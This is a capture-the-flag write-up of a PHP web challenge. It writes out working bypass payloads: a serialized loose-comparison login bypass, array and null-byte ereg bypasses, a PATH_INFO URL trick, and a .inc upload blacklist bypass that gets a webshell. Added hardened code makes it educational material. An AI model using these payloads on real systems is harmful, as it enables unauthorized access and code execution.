Three white hats-Rome 2-writeup

Source: Internet
Author: User
Tags: ereg

0x00

Why did a perfectly good Web challenge turn into Misc? Friendship boat !!!!

http://4e79618700b44607c.jie.sangebaimao.com
0x01 Getting the source token

A challenge with no hints: the source code has to come first. Right-clicking to view the page source shows nothing, so check the response headers.

Set-Cookie source=WXpOV2FXTXpVbmxMUnpGclRsTm5hMWd3WkVaV1JuTnVZekk1TVdOdFRteEtNVEJ3VEVSTmMwNXBhemxRVTBrMFRWZEZNRTFxWTJr

The answer is:

#!php
substr(md5($_GET['source']),3,6)=="81a427"

This familiar check appeared in a BCTF 2016 challenge, though in a slightly different form. Lima provided a tool for it:

#!python
#!/bin/env python
# -*- encoding: utf-8 -*-
import hashlib  # the md5 module is Python 2 only; hashlib works on 2 and 3

def mx(s):
    m1 = hashlib.md5()
    m1.update(s.encode('utf-8'))
    return m1.hexdigest()

if __name__ == '__main__':
    m = '81a427'
    # brute-force an integer whose md5 hex digest carries "81a427" at offset 3
    for x in range(1, 100000000):
        a = mx(str(x))[3:9]
        if a == m:
            print(x)
            break

Running it gives 47733.

/index.php?source=47733

This returns the download path /WoShiYuanMa_SGBM.zip of the source package.

0x02 Login vulnerability
#!php
$password = unserialize($_POST['password']);
if($_POST['username']='admin' && $password['username'] !== 'admin' && $password['password'] !== 'admin'){
    if ($password['username'] == 'admin' && $password['password']=='admin') {
        $_SESSION['login'] = 1;
        echo "Click jump to the Backstage";
    }
}

I started out hunting for an unserialize() vulnerability in PHP, but the actual bug is PHP's weak typing: the loose comparison operator (==).

#!php
(0 == "str")  => true
(0 === "str") => false
Create POST:
username=admin&password=a:2:{s:8:"username";i:0;s:8:"password";i:0;}&submit=1

Passed successfully ~
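The loose-comparison bypass above next to a hardened check, as an added example that is not from the original writeup; the function names are mine. Under PHP 7 and earlier `0 == "admin"` is true, while PHP 8 changed int-to-string comparison so this exact payload no longer passes there; strict comparison and not unserializing untrusted input remain the fix either way.

```php
<?php
// Added example, not from the original writeup. Reproduces the comparison
// logic of the 0x02 login check and shows a type-safe version beside it.

// Constructed payload: both fields are the integer 0, not the string "admin".
$payload = 'a:2:{s:8:"username";i:0;s:8:"password";i:0;}';

// Challenge logic: !== rejects the literal string "admin", then == accepts
// anything PHP loosely equates with it (int 0 on PHP 7 and earlier).
function loose_login(string $serialized): bool {
    // allowed_classes=false blocks object injection but not the comparison bug
    $password = unserialize($serialized, ['allowed_classes' => false]);
    if (!is_array($password)) {
        return false;
    }
    if ($password['username'] !== 'admin' && $password['password'] !== 'admin') {
        if ($password['username'] == 'admin' && $password['password'] == 'admin') {
            return true;
        }
    }
    return false;
}

// Hardened: never unserialize user data; decode JSON, require real strings,
// and compare with a strict, constant-time equality only.
function strict_login(string $json): bool {
    $cred = json_decode($json, true);
    if (!is_array($cred) || !isset($cred['username'], $cred['password'])) {
        return false;
    }
    if (!is_string($cred['username']) || !is_string($cred['password'])) {
        return false;                      // ints, arrays, null never get compared
    }
    return hash_equals('admin', $cred['username'])
        && hash_equals('admin', $cred['password']);
}

var_dump(loose_login($payload));                                     // true on PHP 7, false on PHP 8
var_dump(strict_login('{"username":0,"password":0}'));               // false: integers rejected
var_dump(strict_login('{"username":"admin","password":"admin"}'));   // true
```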

0x03 Second authentication
#!php
if (isset($_POST['salt'])){
    if (ereg("^[a-zA-Z0-9]+$", $_POST['salt']) === FALSE)
    {
        exit('ereg');
    }
    elseif (strlen($_POST['salt']) < 11 && $_POST['salt'] > 999999999)
    {
        if (strpos($_POST['salt'], '*SGBM*') !== FALSE)
        {
            $_SESSION['admin'] = 1;
            echo "Click jump to the Backstage";
        }
    }
}

At first glance this looks harmless.

ereg() applied to an array returns NULL (which is not === FALSE),

strlen() applied to an array likewise returns NULL (and NULL < 11 holds),

an array compared with an int is always greater, so array > 999999999 is true,

and strpos() applied to an array also returns NULL (which is !== FALSE).

Create POST:
salt[]=v&submit=1

Perfect again.

The intended solution, however, was:

bypass ereg() with a %00 null byte (ereg is not binary-safe and stops matching at the NUL),

then use PHP's numeric-string comparison: 9e9 > 999999999.

Intended payload: salt=9e9%00*SGBM*
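Both bypasses above (the array parameter and the null byte plus numeric string) against a type-safe validator, as an added example that is not from the original writeup. The function name is mine; ereg() is gone since PHP 7, and the `*SGBM*` clause, which only the bypass can satisfy, is dropped from the hardened version.

```php
<?php
// Added example, not from the original writeup. Shows the PHP comparison
// quirks the 0x03 check relies on and a validator that closes both bypasses.

// Constructed inputs: the array trick, the intended null-byte payload,
// the bare exponent form, and an honest 10-digit value.
$inputs = [
    'array'    => ['v'],
    'nullbyte' => "9e9\0*SGBM*",
    'exponent' => '9e9',
    'honest'   => '1234567890',
];

// Hardened check: exactly one string, alphanumeric only (preg_match is
// binary-safe, and D stops "$" matching before a trailing newline), then a
// real integer parse instead of a loose numeric-string comparison.
function validate_salt($salt): bool {
    if (!is_string($salt)) {
        return false;                      // arrays never reach the string functions
    }
    if (preg_match('/^[a-zA-Z0-9]+$/D', $salt) !== 1) {
        return false;                      // the NUL and "*" are seen, so this fails
    }
    $n = filter_var($salt, FILTER_VALIDATE_INT);   // false for "9e9"
    if ($n === false || strlen($salt) >= 11 || $n <= 999999999) {
        return false;
    }
    return true;
}

// The quirks themselves, still true on current PHP:
var_dump("9e9" > 999999999);   // true: numeric string compared as a number
var_dump([] > 999999999);      // true: an array is greater than any scalar

foreach ($inputs as $label => $salt) {
    printf("%-8s => %s\n", $label, validate_salt($salt) ? 'accepted' : 'rejected');
}
// array, nullbyte and exponent are rejected; only honest is accepted
```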

0x04 PATHINFO mode
#!php
$URL = $_SERVER['REQUEST_URI'];
$matches = array();
preg_match('/^([a-z\/.]+)$/', $URL, $matches);
if(strpos($URL, './') !== FALSE){
    exit('./');
}else if(strpos($URL, '\\') !== FALSE){
    exit('\\');
}else if(empty($matches) || $matches[1] != $URL){
    exit('empty($matches) || $matches[1] != $URL');
} else if(strpos($URL, '//') !== FALSE){
    exit('//');
} else if(substr($URL, -10) !== '/index.php'){
    exit('substr($URL, -10) !== \'/index.php\'');
} else if(strpos($URL, 'p.') !== FALSE){
    exit('p.');
} else if($URL == '/admin/index.php'){
    exit('$URL == \'/admin/index.php\'');
}else {
    if($URL !== '/admin/index.php'){
        $_SESSION['power'] = 1;
        exit("Click jump to the Backstage");
    }
}

I started over from the beginning again and again without finding a solution, until a tip arrived from a master.

Still lacking experience ~

LN tips:

Answer Question (516421987) 1:12:49: with a bit more framework experience you should be able to guess it.

Search Baidu for PATHINFO mode.

URL: /admin/index.php/admin/index.php

Passed successfully ~
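Why the PATH_INFO URL passes every test above, and a check that decides on the path the server actually resolved instead of the raw request URI, as an added example that is not from the original writeup. The function names and the constructed `$_SERVER` values are mine; SCRIPT_NAME and PATH_INFO are the standard CGI variables PHP populates.

```php
<?php
// Added example, not from the original writeup. The 0x04 checks run on the
// raw REQUEST_URI, so trailing PATH_INFO satisfies every substring test while
// the server still executes /admin/index.php.

// The challenge's decision chain, reduced to a function of the URI.
function uri_check(string $url): string {
    $matches = [];
    preg_match('/^([a-z\/.]+)$/', $url, $matches);
    if (strpos($url, './') !== false)             return './';
    if (strpos($url, '\\') !== false)             return '\\';
    if (empty($matches) || $matches[1] != $url)   return 'charset';
    if (strpos($url, '//') !== false)             return '//';
    if (substr($url, -10) !== '/index.php')       return 'suffix';
    if (strpos($url, 'p.') !== false)             return 'p.';
    if ($url == '/admin/index.php')               return 'exact match';
    return 'power=1';                              // the branch the bypass reaches
}

// Hardened: decide on what the server resolved. SCRIPT_NAME is the script
// that will run, without PATH_INFO or the query string; PATH_INFO is the
// trailing part. Constructed $server values stand in for a live request.
function resolved_check(array $server): string {
    $script = $server['SCRIPT_NAME'] ?? '';
    $extra  = $server['PATH_INFO'] ?? '';
    if ($extra !== '')                   return 'unexpected PATH_INFO';
    if ($script === '/admin/index.php')  return 'admin script: denied';
    return 'power=1';
}

$uri = '/admin/index.php/admin/index.php';       // the URL from the writeup
echo uri_check($uri), "\n";                      // power=1: every test passes
echo resolved_check([
    'REQUEST_URI' => $uri,
    'SCRIPT_NAME' => '/admin/index.php',         // what the web server maps it to
    'PATH_INFO'   => '/admin/index.php',
]), "\n";                                        // unexpected PATH_INFO
```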

0x05 Fuzzing the upload
#!php
if ($_FILES["file"]['size'] > 0 && $_FILES["file"]['size'] < 102400) {
    $typeAccepted = ["image/jpeg", "image/gif", "image/png"];
    $blackext = ["php", "php3", "php4", "php5", "pht", "phtml", "phps"]; // there is always one that fits
    $filearr = pathinfo($_FILES["file"]["name"]);
    if (!in_array($_FILES["file"]['type'], $typeAccepted)) {
        exit("type error");
    }
    if (in_array($filearr["extension"], $blackext)) {
        exit("extension error");
    }
    $filename = md5(time() . rand(10, 99)) . "." . $filearr["extension"];
    $destination_folder = '../uploads/';
    $destination_folder .= date('Y', time()) . "/" . date('M', time()) . "/";
    $file_name_path = $destination_folder . $filename;
    if (!file_exists($destination_folder)) mkdir('./' . $destination_folder, 0777, true);
    if (move_uploaded_file($_FILES["file"]['tmp_name'], $file_name_path)) {
        exit('upload success!');
    } else {
        exit('upload false!');
    }
}

The extension blacklist on the final day: $blackext = ["php", "php3", "php4", "php5", "pht", "phtml", "phps"];

The stored file name: $filename = md5(time() . rand(10, 99)) . "." . $filearr["extension"];

So it comes down to fuzzing the extension.

At first I guessed at extensions the server might parse, but those were basically all the old ones already on the list. Eventually I remembered there is also the inc extension.

If I hadn't just been playing with Phar packaging, I would never have remembered that inc is a PHP-related extension.

#!php
<?php
$phar = new Phar('virink.phar');
$phar->buildFromDirectory(dirname(__FILE__) . '/virink');
$phar->setStub($phar->createDefaultStub('virink.php', 'virink.php'));
$phar->compressFiles(Phar::GZ);
?>

Generate virink.phar and inside its stub you will find:

#!php
Extract_Phar::go(true);
$mimes = array(
    'phps' => 2,
    ...,
    'xsd' => 'text/plain',
    'php' => 1,
    'inc' => 1,
    'avi' => 'video/avi',
    ...

So if the server also executes .inc as PHP, the uploaded file can be connected to as a shell.

A really nice challenge.

As for brute-forcing the stored file name: when I started fuzzing I wrote a PoC in PHP.

#!php
<?php
// the upload helper fuck() and the start of the heredoc did not survive on the source page
$contents = <<<TEXT
virink
TEXT;
$ext = 'inc';
fuck($ext, $contents);
?>

It is slightly awkward to adapt, but it will be useful later.

Getshell successful ~~
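Why `.inc` slips past the blacklist in 0x05 and what an allowlist plus server-controlled naming looks like, as an added example that is not from the original writeup. The function names and the constructed file names are mine; mime_content_type() needs the fileinfo extension.

```php
<?php
// Added example, not from the original writeup. Compares the challenge's
// denylist on the client-supplied extension with an allowlist that also
// checks content and never reuses the client's name or extension.

$blackext = ["php", "php3", "php4", "php5", "pht", "phtml", "phps"];

// Challenge logic: trust the client's MIME type, deny a fixed list of extensions.
function blacklist_accepts(string $name, string $clientType, array $blackext): bool {
    $typeAccepted = ["image/jpeg", "image/gif", "image/png"];
    $ext = pathinfo($name, PATHINFO_EXTENSION);
    return in_array($clientType, $typeAccepted, true) && !in_array($ext, $blackext, true);
}

// Hardened: allowlist the extension, derive the type from the file content,
// and generate an unguessable name (md5(time().rand(10,99)) is brute-forceable).
// $tmpPath is a constructed path to the uploaded temp file.
function allowlist_name(string $name, string $tmpPath): ?string {
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'gif' => 'image/gif',  'png' => 'image/png'];
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;                                  // inc, phtml, anything else: out
    }
    $real = is_file($tmpPath) ? mime_content_type($tmpPath) : false;
    if ($real !== $allowed[$ext]) {
        return null;                                  // content must match the extension
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;    // our extension, random name
}

// Constructed inputs: the .inc PoC name and a blacklisted one.
var_dump(blacklist_accepts('shell.inc', 'image/png', $blackext));   // true: inc is not listed
var_dump(blacklist_accepts('shell.php', 'image/png', $blackext));   // false
var_dump(allowlist_name('shell.inc', '/tmp/constructed-upload'));   // NULL: not allowlisted
```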

0x06 What on earth? Misc

After getting the shell, it really hurts!

Imstudy (214329772) 1:44:30: I told you the shell is broken, you didn't believe me.

Well, Imstudy is the challenge author, guys. Put away that spiked mace in your hand and keep the security cards intact ~~

After connecting with Caidao (China Chopper), I found an image flag.jpg under /var/www/.

With Stegsolve + WinHex I extracted the archive containing flag.txt.

But it is not the real flag: the file holds N lines in (x, y, z) format, and since the values start at 0 and stay within a small range, the guess is that they are RGB values.

So the image has to be reconstructed.

Counting the lines shows the count is not a perfect square, so the picture is not square either.

Quietly wrote a PoC, and it rebuilt the picture perfectly.

#!python
#!/bin/env python
# -*- encoding: utf-8 -*-
# __author__: virink
from PIL import Image
import math

if __name__ == '__main__':
    count = len(open('flag.txt', 'r').readlines())
    # search for a width x height pair near the square root that multiplies to the line count
    j = int(math.sqrt(count))
    i = j + 2
    for k in range(0, i // 4):
        sx = i - k
        sy = j + k
        if (sx * sy) == count:
            break
    c = Image.new("RGB", (sx, sy))
    file = open('flag.txt')
    for x in range(0, sx):
        for y in range(0, sy):
            line = file.readline()      # read one line
            rgb = line.split(",")       # split into r, g, b
            c.putpixel((x, y), (int(rgb[0]), int(rgb[1]), int(rgb[2])))
    c.show()
    c.save("flag.png")

Done. At this point my brain is fried!

FLAG : miao{fb49ac8a528901913ea2c664c6a8d6a1}
